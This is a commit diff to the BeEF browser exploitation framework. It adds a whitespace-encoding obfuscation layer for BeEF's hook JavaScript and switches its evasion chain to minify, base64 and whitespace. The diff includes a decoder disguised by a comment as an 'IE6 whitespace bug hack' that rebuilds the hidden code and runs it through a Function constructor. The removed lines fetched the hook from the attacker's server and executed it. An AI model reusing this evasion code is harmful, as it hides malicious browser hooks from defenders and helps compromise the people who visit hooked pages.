modified whitespace evasion technique to keep it simple - modified beefjs (just one line, i don't had much time to investigate my change but it seems to work better with it than without it :)
This commit is contained in:
Jean-Louis Huynen
@@ -104,8 +104,7 @@ module BeEF
|
||||
|
||||
if config.get("beef.extension.evasion.enable")
|
||||
evasion = BeEF::Extension::Evasion::Evasion.instance
|
||||
@hook = evasion.add_bootstrapper + evasion.obfuscate(@hook)
|
||||
@final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate) + @hook
|
||||
@final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
|
||||
else
|
||||
@final_hook = ext_js_to_not_obfuscate + @hook
|
||||
end
|
||||
|
||||
@@ -26,4 +26,5 @@ beef:
|
||||
beef: "beef"
|
||||
Beef: "Beef"
|
||||
evercookie: "evercookie"
|
||||
chain: ["scramble", "minify"]
|
||||
#chain: ["scramble", "minify"]
|
||||
chain: ["minify", "base64", "whitespace"]
|
||||
|
||||
@@ -30,3 +30,4 @@ require 'extensions/evasion/helper'
|
||||
require 'extensions/evasion/obfuscation/scramble'
|
||||
require 'extensions/evasion/obfuscation/minify'
|
||||
require 'extensions/evasion/obfuscation/base_64'
|
||||
require 'extensions/evasion/obfuscation/whitespace'
|
||||
|
||||
@@ -20,56 +20,40 @@ module BeEF
|
||||
include Singleton
|
||||
|
||||
def need_bootstrap
|
||||
false
|
||||
true
|
||||
end
|
||||
|
||||
def get_bootstrap
|
||||
# the decode function is in plain text - called IE-spacer - because trolling is always a good idea
|
||||
decode_function =
|
||||
"//Dirty IE6 whitespace bug hack
|
||||
function IE_spacer(css_space) {
|
||||
var spacer = '';
|
||||
for(y = 0; y < css_space.length/8; y++)
|
||||
{
|
||||
v = 0;
|
||||
for(x = 0; x < 8; x++)
|
||||
{
|
||||
if(css_space.charCodeAt(x+(y*8)) > 9)
|
||||
{
|
||||
v++;
|
||||
}
|
||||
if(x != 7)
|
||||
{
|
||||
v = v << 1;
|
||||
}
|
||||
}
|
||||
spacer += String.fromCharCode(v);
|
||||
}return spacer;
|
||||
}"
|
||||
end
|
||||
|
||||
def execute(input, config)
|
||||
print_debug input.length
|
||||
size = input.length
|
||||
encoded = encode(input)
|
||||
var_name = BeEF::Extension::Evasion::Helper::random_string(3)
|
||||
|
||||
config = BeEF::Core::Configuration.instance
|
||||
hook = config.get("beef.http.hook_file")
|
||||
host = config.get("beef.http.host")
|
||||
port = config.get("beef.http.port")
|
||||
decode_function =
|
||||
"
|
||||
//Dirty IE6 whitespace bug hack
|
||||
#{var_name} = function (){
|
||||
jQuery.get(\'http://#{host}:#{port}#{hook}\', function callback(data) {
|
||||
var output = '';
|
||||
var str = '//E'+'OH';
|
||||
var chunks = data.split(str);
|
||||
for (var i = 0; i < chunks.length; i++)
|
||||
{
|
||||
if(chunks[i].substring(0,4) == '----')
|
||||
{
|
||||
input = chunks[i].split('\\n');
|
||||
input = input[0].substring(5);
|
||||
for(y = 0; y < input.length/8; y++)
|
||||
{
|
||||
v = 0;
|
||||
for(x = 0; x < 8; x++)
|
||||
{
|
||||
if(input.charCodeAt(x+(y*8)) > 9)
|
||||
{
|
||||
v++;
|
||||
}
|
||||
if(x != 7)
|
||||
{
|
||||
v = v << 1;
|
||||
}
|
||||
}
|
||||
output += String.fromCharCode(v);
|
||||
}
|
||||
}
|
||||
}alert(output.length);[].constructor.constructor(output)();
|
||||
}, 'text');
|
||||
}
|
||||
#{var_name}();//EOH-----"
|
||||
|
||||
input = "#{decode_function}#{encoded}"
|
||||
print_debug "[OBFUSCATION - WHITESPACE] Javascript has been Whitespace Encoded"
|
||||
var_name = BeEF::Extension::Evasion::Helper::random_string(3)
|
||||
input = "var #{var_name}=\"#{encoded}\";[].constructor.constructor(IE_spacer(#{var_name}))();"
|
||||
print_debug "[OBFUSCATION - WHITESPACE] #{size}byte of Javascript code has been Whitespaced"
|
||||
input
|
||||
end
|
||||
|
||||
|
||||
Reference in New Issue
Block a user